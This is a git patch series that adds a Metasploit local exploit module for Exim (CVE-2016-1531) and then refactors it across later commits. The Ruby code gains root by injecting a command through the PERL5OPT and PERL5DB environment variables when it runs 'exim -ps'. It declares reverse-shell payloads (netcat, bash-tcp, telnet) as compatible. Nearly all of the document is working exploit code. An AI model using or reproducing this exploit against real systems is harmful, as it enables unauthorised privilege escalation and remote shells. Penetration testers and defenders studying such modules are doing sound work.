From 43e74fce9e65dc6dff7cfedbb116a066bffc752e Mon Sep 17 00:00:00 2001 From: William Vu Date: Mon, 4 Apr 2016 23:37:09 -0500 Subject: [PATCH 1/5] Add Exim privesc --- .../exploits/unix/local/exim_perl_startup.rb | 63 +++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 modules/exploits/unix/local/exim_perl_startup.rb diff --git a/modules/exploits/unix/local/exim_perl_startup.rb b/modules/exploits/unix/local/exim_perl_startup.rb new file mode 100644 index 0000000000..26c2d0db72 --- /dev/null +++ b/modules/exploits/unix/local/exim_perl_startup.rb @@ -0,0 +1,63 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + + Rank = ExcellentRanking + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Exim "perl_startup" Privilege Escalation', + 'Description' => %q{ + This module exploits a Perl injection vulnerability in Exim < 4.86.2 + given the presence of the "perl_startup" configuration parameter. + }, + 'Author' => [ + 'Dawid Golunski', # Vulnerability discovery + 'wvu' # Metasploit module + ], + 'References' => [ + ['CVE', '2016-1531'], + ['EDB', '39549'], + ['URL', 'http://www.exim.org/static/doc/CVE-2016-1531.txt'] + ], + 'DisclosureDate' => 'Mar 10 2016', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'SessionTypes' => ['shell', 'meterpreter'], + 'Privileged' => true, + 'Payload' => { + 'BadChars' => "\x22\x27", # " and ' + 'Compat' => { + 'PayloadType' => 'cmd cmd_bash', + 'RequiredCmd' => 'generic netcat netcat-e bash-tcp' + } + }, + 'Targets' => [ + ['Exim < 4.86.2', {}] + ], + 'DefaultTarget' => 0 + )) + end + + def check + if x('whoami') == 'root' + CheckCode::Vulnerable + else + CheckCode::Safe + end + end + + def exploit + x(payload.encoded) + end + + def x(c) + # PERL5DB technique from http://perldoc.perl.org/perlrun.html + cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "#{c}"' exim -ps 2>&-}) + end + +end From 07ee18a62b890e567afea40ad75ecad8b1294f1d Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 13 Apr 2016 18:12:43 -0500 Subject: [PATCH 2/5] Do something shady with the exploit method Hat tip @acammack-r7. --- modules/exploits/unix/local/exim_perl_startup.rb | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/modules/exploits/unix/local/exim_perl_startup.rb b/modules/exploits/unix/local/exim_perl_startup.rb index 26c2d0db72..12c378f35d 100644 --- a/modules/exploits/unix/local/exim_perl_startup.rb +++ b/modules/exploits/unix/local/exim_perl_startup.rb @@ -44,18 +44,14 @@ class MetasploitModule < Msf::Exploit::Local end def check - if x('whoami') == 'root' + if exploit('whoami') == 'root' CheckCode::Vulnerable else CheckCode::Safe end end - def exploit - x(payload.encoded) - end - - def x(c) + def exploit(c = payload.encoded) # PERL5DB technique from http://perldoc.perl.org/perlrun.html cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "#{c}"' exim -ps 2>&-}) end From f8e4253e2f44c57eea53db285ab8686e8142894a Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 13 Apr 2016 18:22:28 -0500 Subject: [PATCH 3/5] Add telnet to RequiredCmd Baffles me that cmd/unix/reverse isn't cmd/unix/reverse_telnet. --- modules/exploits/unix/local/exim_perl_startup.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/local/exim_perl_startup.rb b/modules/exploits/unix/local/exim_perl_startup.rb index 12c378f35d..6469afb202 100644 --- a/modules/exploits/unix/local/exim_perl_startup.rb +++ b/modules/exploits/unix/local/exim_perl_startup.rb @@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Local 'BadChars' => "\x22\x27", # " and ' 'Compat' => { 'PayloadType' => 'cmd cmd_bash', - 'RequiredCmd' => 'generic netcat netcat-e bash-tcp' + 'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet' } }, 'Targets' => [ From de004d7da3259ab2e626d7c7144b2859f2f6795e Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 13 Apr 2016 19:32:20 -0500 Subject: [PATCH 4/5] Line up some hash rockets --- .../exploits/unix/local/exim_perl_startup.rb | 30 +++++++++---------- 1 file changed, 15 insertions(+), 15 deletions(-) diff --git a/modules/exploits/unix/local/exim_perl_startup.rb b/modules/exploits/unix/local/exim_perl_startup.rb index 6469afb202..3b91474a3d 100644 --- a/modules/exploits/unix/local/exim_perl_startup.rb +++ b/modules/exploits/unix/local/exim_perl_startup.rb @@ -9,37 +9,37 @@ class MetasploitModule < Msf::Exploit::Local def initialize(info = {}) super(update_info(info, - 'Name' => 'Exim "perl_startup" Privilege Escalation', - 'Description' => %q{ + 'Name' => 'Exim "perl_startup" Privilege Escalation', + 'Description' => %q{ This module exploits a Perl injection vulnerability in Exim < 4.86.2 given the presence of the "perl_startup" configuration parameter. }, - 'Author' => [ + 'Author' => [ 'Dawid Golunski', # Vulnerability discovery 'wvu' # Metasploit module ], - 'References' => [ + 'References' => [ ['CVE', '2016-1531'], ['EDB', '39549'], ['URL', 'http://www.exim.org/static/doc/CVE-2016-1531.txt'] ], - 'DisclosureDate' => 'Mar 10 2016', - 'License' => MSF_LICENSE, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'SessionTypes' => ['shell', 'meterpreter'], - 'Privileged' => true, - 'Payload' => { - 'BadChars' => "\x22\x27", # " and ' - 'Compat' => { + 'DisclosureDate' => 'Mar 10 2016', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'SessionTypes' => ['shell', 'meterpreter'], + 'Privileged' => true, + 'Payload' => { + 'BadChars' => "\x22\x27", # " and ' + 'Compat' => { 'PayloadType' => 'cmd cmd_bash', 'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet' } }, - 'Targets' => [ + 'Targets' => [ ['Exim < 4.86.2', {}] ], - 'DefaultTarget' => 0 + 'DefaultTarget' => 0 )) end From 252632a8026e4deeacba0fd864fb4bfcdab46788 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 13 Apr 2016 19:38:27 -0500 Subject: [PATCH 5/5] Use %w{} for a couple things Why not? :) --- modules/exploits/unix/local/exim_perl_startup.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/unix/local/exim_perl_startup.rb b/modules/exploits/unix/local/exim_perl_startup.rb index 3b91474a3d..062190d860 100644 --- a/modules/exploits/unix/local/exim_perl_startup.rb +++ b/modules/exploits/unix/local/exim_perl_startup.rb @@ -19,15 +19,15 @@ class MetasploitModule < Msf::Exploit::Local 'wvu' # Metasploit module ], 'References' => [ - ['CVE', '2016-1531'], - ['EDB', '39549'], - ['URL', 'http://www.exim.org/static/doc/CVE-2016-1531.txt'] + %w{CVE 2016-1531}, + %w{EDB 39549}, + %w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt} ], 'DisclosureDate' => 'Mar 10 2016', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, - 'SessionTypes' => ['shell', 'meterpreter'], + 'SessionTypes' => %w{shell meterpreter}, 'Privileged' => true, 'Payload' => { 'BadChars' => "\x22\x27", # " and '